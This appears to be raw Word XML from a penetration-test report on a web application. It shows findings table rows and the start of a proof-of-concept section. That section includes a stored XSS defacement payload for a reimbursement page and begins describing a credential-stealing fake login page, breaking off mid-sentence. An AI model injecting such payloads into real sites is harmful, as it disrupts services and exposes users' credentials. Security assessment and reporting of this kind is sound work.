                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2019-11358</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="0DEC1F2B" w14:textId="77777777" w:rsidTr="001E0482">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="583" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="070ACBC3" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4437B0C9" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>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A10:2017-Insufficient Logging &amp; Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2785EAA9" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57880E7D" w14:textId="77777777"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Insufficient Logging &amp; Monitoring Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="19A0BAFD" w14:textId="77777777"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When a security-critical event occurs, the software either does not record the event or omits important details about the event when logging it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46322CC3" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CWE-778: Insufficient Logging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002622EE" w14:paraId="0D4DAED7" w14:textId="77777777" w:rsidTr="001E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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36745E6F" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1822" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29578970" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>A6:2017-Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E40619C" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>rmational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="26ED61EF"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rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>Web application cookies not marked secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2386" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7BD2D381" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC4260">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>HTTP session cookies might be transmitted in cleartext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1789" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6208F937" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="00CC4260" w:rsidRDefault="002622EE" w:rsidP="0092366F">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB2765">
              <w:rPr>
                <w:rFonts w:cs="Wingdings"/>
              </w:rPr>
              <w:t>CWE-522: Insufficiently Protected Credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78392B3E" w14:textId="77777777" w:rsidR="002622EE" w:rsidRPr="002E6F3E" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="443CF21E" w14:textId="77777777" w:rsidR="002622EE" w:rsidRDefault="002622EE" w:rsidP="002622EE">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="659023C4" w14:textId="70E6710C" w:rsidR="00D46C24" w:rsidRDefault="006E2076" w:rsidP="006E2076">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc94100247"/>
      <w:r w:rsidRPr="626F33D1">
        <w:lastRenderedPageBreak/>
        <w:t>Proof-of-Concept Exploitation</w:t>
      </w:r>
      <w:r w:rsidR="00A46162">
        <w:t xml:space="preserve"> and Post Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="0E29ACB4" w14:textId="3CFA44B6" w:rsidR="00100A07" w:rsidRDefault="00B10218" w:rsidP="00100A07">
      <w:r>
        <w:t xml:space="preserve">This section would </w:t>
      </w:r>
      <w:r w:rsidR="003A6F84">
        <w:t xml:space="preserve">discuss the procedures, tools, and </w:t>
      </w:r>
      <w:r w:rsidR="00B07F1E">
        <w:t>outcomes</w:t>
      </w:r>
      <w:r w:rsidR="00E67569">
        <w:t xml:space="preserve"> during the exploitation of the vulnerabilities. </w:t>
      </w:r>
      <w:r w:rsidR="00773E4A">
        <w:t xml:space="preserve">The vulnerabilities exploited are based on the Proof-of-Concept use cases. </w:t>
      </w:r>
      <w:r w:rsidR="00E67569">
        <w:t>Recommendations to mitigate or prevent future exploitations would also be discussed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA1E21F" w14:textId="77777777" w:rsidR="000C28D0" w:rsidRPr="00100A07" w:rsidRDefault="000C28D0" w:rsidP="00100A07"/>
    <w:p w14:paraId="24F1E01C" w14:textId="72F9A041" w:rsidR="00091740" w:rsidRDefault="004462C2" w:rsidP="00AC26E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc93487304"/>
      <w:bookmarkStart w:id="118" w:name="_Toc93502881"/>
      <w:bookmarkStart w:id="119" w:name="_Toc93526917"/>
      <w:bookmarkStart w:id="120" w:name="_Toc94100248"/>
      <w:r>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkEnd w:id="120"/>
    </w:p>
    <w:p w14:paraId="66245220" w14:textId="1A6F88A4" w:rsidR="00335E50" w:rsidRDefault="00335E50" w:rsidP="00335E50">
      <w:r>
        <w:t>The reimbursement page is vulnerable to XSS, and this can allow the attacker to inject malicious scripts which will be stored in the database (Stored XSS) and affect the web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A1DBD6" w14:textId="77777777" w:rsidR="00335E50" w:rsidRPr="00335E50" w:rsidRDefault="00335E50" w:rsidP="00335E50"/>
    <w:p w14:paraId="56B1EA67" w14:textId="13E461C0" w:rsidR="000B2706" w:rsidRDefault="006009E9" w:rsidP="000B2706">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="121" w:name="_Toc93487305"/>
      <w:bookmarkStart w:id="122" w:name="_Toc93502882"/>
      <w:bookmarkStart w:id="123" w:name="_Toc93526918"/>
      <w:bookmarkStart w:id="124" w:name="_Toc94100249"/>
      <w:r>
        <w:t>Website Defacement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkEnd w:id="123"/>
      <w:bookmarkEnd w:id="124"/>
    </w:p>
    <w:p w14:paraId="4CEAF71F" w14:textId="6DDA3878" w:rsidR="00926D61" w:rsidRPr="00926D61" w:rsidRDefault="00926D61" w:rsidP="00926D61">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A78A64" w14:textId="456DFDED" w:rsidR="00FE7573" w:rsidRDefault="00580966" w:rsidP="00966EDA">
      <w:r>
        <w:t>An example of a</w:t>
      </w:r>
      <w:r w:rsidR="00D55005">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00396B4B">
        <w:t xml:space="preserve">stored </w:t>
      </w:r>
      <w:r w:rsidR="00D55005">
        <w:t>XSS attack is website defacement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This attack affects the availability of the web application, preventing </w:t>
      </w:r>
      <w:r w:rsidR="001C237D">
        <w:t>all users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from viewing the resources within </w:t>
      </w:r>
      <w:r w:rsidR="00626CDF">
        <w:t>that specific page</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00520DF5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB3EB0">
        <w:t>In this exploit</w:t>
      </w:r>
      <w:r w:rsidR="00D60023">
        <w:t>, a website defacement attack will be emulated on the site.</w:t>
      </w:r>
      <w:r w:rsidR="00177C0E">
        <w:t xml:space="preserve"> The entry point is located </w:t>
      </w:r>
      <w:r w:rsidR="3CE0E5A4">
        <w:t>on</w:t>
      </w:r>
      <w:r w:rsidR="00177C0E">
        <w:t xml:space="preserve"> the Employee Reimbursement </w:t>
      </w:r>
      <w:r w:rsidR="00C37634">
        <w:t>page</w:t>
      </w:r>
      <w:r w:rsidR="00503C0F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217C858E" w14:textId="1972593B" w:rsidR="00BE0ABC" w:rsidRDefault="00735118" w:rsidP="006948AF">
      <w:r w:rsidRPr="00735118">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37C663C8" wp14:editId="56A7D7AA">
            <wp:extent cx="5889427" cy="1795142"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="207" name="Picture 20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website&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5937212" cy="1809707"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1BFFE5" w14:textId="77777777" w:rsidR="00F959B3" w:rsidRDefault="00F959B3" w:rsidP="00966EDA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C7C5D75" w14:textId="77777777" w:rsidR="00A000F9" w:rsidRDefault="00A000F9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF445CE" w14:textId="78693BC3" w:rsidR="00A4363C" w:rsidRDefault="00141E66" w:rsidP="00F959B3">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When requesting a new reimbursement, the description </w:t>
      </w:r>
      <w:r w:rsidR="00B91324">
        <w:t xml:space="preserve">box input is not sanitized and allows scripts to be </w:t>
      </w:r>
      <w:r w:rsidR="00FB2092">
        <w:t>stored within the we</w:t>
      </w:r>
      <w:r w:rsidR="00455590">
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="00FB2092">
        <w:t xml:space="preserve"> application database.</w:t>
      </w:r>
      <w:r w:rsidR="00F959B3">
        <w:t xml:space="preserve"> Below is the payload used to launch the attack.</w:t>
      </w:r>
      <w:r w:rsidR="00F70772" w:rsidRPr="00F70772">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B80167" w14:paraId="15E39EBF" w14:textId="77777777" w:rsidTr="00B80167">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E9F71F6" w14:textId="275EEF37" w:rsidR="00B80167" w:rsidRPr="00C6762F" w:rsidRDefault="00B80167" w:rsidP="004C2D19">
            <w:r w:rsidRPr="00C6762F">
              <w:t>&lt;script&gt;document.body.innerHTML='&lt;h1&gt;Web Site Defaced !&lt;/h1&gt;'&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39AE582E" w14:textId="024DDA80" w:rsidR="00D1112C" w:rsidRDefault="00F70772" w:rsidP="005F755A">
      <w:pPr>
        <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658300" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12E18F72" wp14:editId="03573DEF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2172614</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>705865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1667866" cy="321767"/>
                <wp:effectExtent l="0" t="0" r="27940" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="113" name="Rectangle 113"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1667866" cy="3217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970362">
              <v:rect id="Rectangle 113" style="position:absolute;margin-left:171.05pt;margin-top:55.6pt;width:131.35pt;height:25.3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5407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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00875C46">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43C6BD7B" wp14:editId="3025EB31">
            <wp:extent cx="5943600" cy="2109470"/>
            <wp:effectExtent l="0" t="0" r="0" b="508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109470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DA21DB" w14:textId="77777777" w:rsidR="00CA1B16" w:rsidRDefault="00CA1B16" w:rsidP="00966EDA">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79BE2DCD" w14:textId="16DDF20C" w:rsidR="00946ACA" w:rsidRDefault="004D3835" w:rsidP="00966EDA">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the script above is stored within </w:t>
      </w:r>
      <w:r w:rsidR="00B07F1E">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">web application database, it </w:t>
      </w:r>
      <w:r w:rsidR="00CE3C40">
        <w:t>rewrites</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the existing contents within the reimbursement page with the new content which is a header stating</w:t>
      </w:r>
      <w:r w:rsidR="00966EDA">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ‘Web Site </w:t>
      </w:r>
      <w:r w:rsidR="00D1112C">
        <w:t>Defaced!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’. This prevents the user from accessing the reimbursement page </w:t>
      </w:r>
      <w:r w:rsidR="002A013E">
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidR="000701C1">
        <w:t xml:space="preserve">the new content </w:t>
      </w:r>
      <w:r w:rsidR="0087148F">
        <w:t>is stored within the database</w:t>
      </w:r>
      <w:r w:rsidR="00E9336B">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00CA63EE">
        <w:t>executes</w:t>
      </w:r>
      <w:r w:rsidR="00E9336B">
        <w:t xml:space="preserve"> when</w:t>
      </w:r>
      <w:r w:rsidR="005F2738">
        <w:t>ever</w:t>
      </w:r>
      <w:r w:rsidR="00E9336B">
        <w:t xml:space="preserve"> the user access</w:t>
      </w:r>
      <w:r w:rsidR="005F2738">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00E9336B">
        <w:t xml:space="preserve"> the page</w:t>
      </w:r>
      <w:r w:rsidR="006472CA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00913348">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="005E3AA3">
        <w:t>outcome</w:t>
      </w:r>
      <w:r w:rsidR="00913348">
        <w:t xml:space="preserve"> of th</w:t>
      </w:r>
      <w:r w:rsidR="00CA63EE">
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00913348">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E56E7">
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00913348">
        <w:t xml:space="preserve"> can be seen in the image below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE990B" w14:textId="467B7BA8" w:rsidR="00B418D7" w:rsidRDefault="008A2B46" w:rsidP="00100A07">
      <w:r w:rsidRPr="008A2B46">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A43B50D" wp14:editId="0A3F41B3">
            <wp:extent cx="5943600" cy="897890"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="217" name="Picture 2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Shape&#10;&#10;Description automatically generated with low confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="897890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52158352" w14:textId="77777777" w:rsidR="00946ACA" w:rsidRDefault="00946ACA" w:rsidP="00123983">
      <w:bookmarkStart w:id="125" w:name="_Toc93487306"/>
      <w:bookmarkStart w:id="126" w:name="_Toc93502883"/>
      <w:bookmarkStart w:id="127" w:name="_Toc93526919"/>
    </w:p>
    <w:p w14:paraId="171D963E" w14:textId="77777777" w:rsidR="00A000F9" w:rsidRDefault="00A000F9">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E822D0" w14:textId="3A1A1ED5" w:rsidR="000B2706" w:rsidRDefault="006009E9" w:rsidP="000B2706">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc94100250"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Fake Login Page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkEnd w:id="127"/>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w14:paraId="1EF03AE6" w14:textId="2DA3C0BE" w:rsidR="008D2303" w:rsidRPr="008D2303" w:rsidRDefault="008D2303" w:rsidP="008D2303">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72CAFD" w14:textId="6849D24D" w:rsidR="006A57B3" w:rsidRDefault="002617F4" w:rsidP="00966EDA">
      <w:r>
        <w:t>Another exploita</w:t>
      </w:r>
      <w:r w:rsidR="00BA5D6E">
        <w:t>tion</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that can be used for Cross-Site Scripting </w:t>
      </w:r>
      <w:r w:rsidR="009A5E68">
        <w:t xml:space="preserve">is credentials stealing using a </w:t>
      </w:r>
      <w:r w:rsidR="00C8680B">
        <w:t xml:space="preserve">malicious login page. </w:t>
      </w:r>
      <w:r w:rsidR="00CA3227">
        <w:t>This is usually associated with Social Engineering attack as it involves the victim entering his</w:t>
      </w:r>
      <w:r w:rsidR="003136AE">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00CA3227">
        <w:t>her username and password onto the attacker’s website. When the form is submitted, the request with the credentials is sent over to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2B1C1E" w14:textId="4C3D5DAE" w:rsidR="000D5662" w:rsidRPr="006A57B3" w:rsidRDefault="00880808" w:rsidP="00966EDA">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00AB70F6">
        <w:t xml:space="preserve">login page for the web application was </w:t>
      </w:r>
      <w:r w:rsidR="00713E59">
        <w:t xml:space="preserve">copied to mimic the </w:t>
      </w:r>
      <w:r w:rsidR="007B482C">
        <w:t>login page to look as legitimate as possible.</w:t>
      </w:r>
      <w:r w:rsidR="009759C3">
        <w:t xml:space="preserve"> These files </w:t>
      </w:r>
      <w:r w:rsidR="00024A7F">
        <w:t>are within the attacker’s directory</w:t>
      </w:r>
      <w:r w:rsidR="00C2413A">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00024A7F">
        <w:t xml:space="preserve"> f</w:t>
      </w:r>
      <w:r w:rsidR="009759C3">
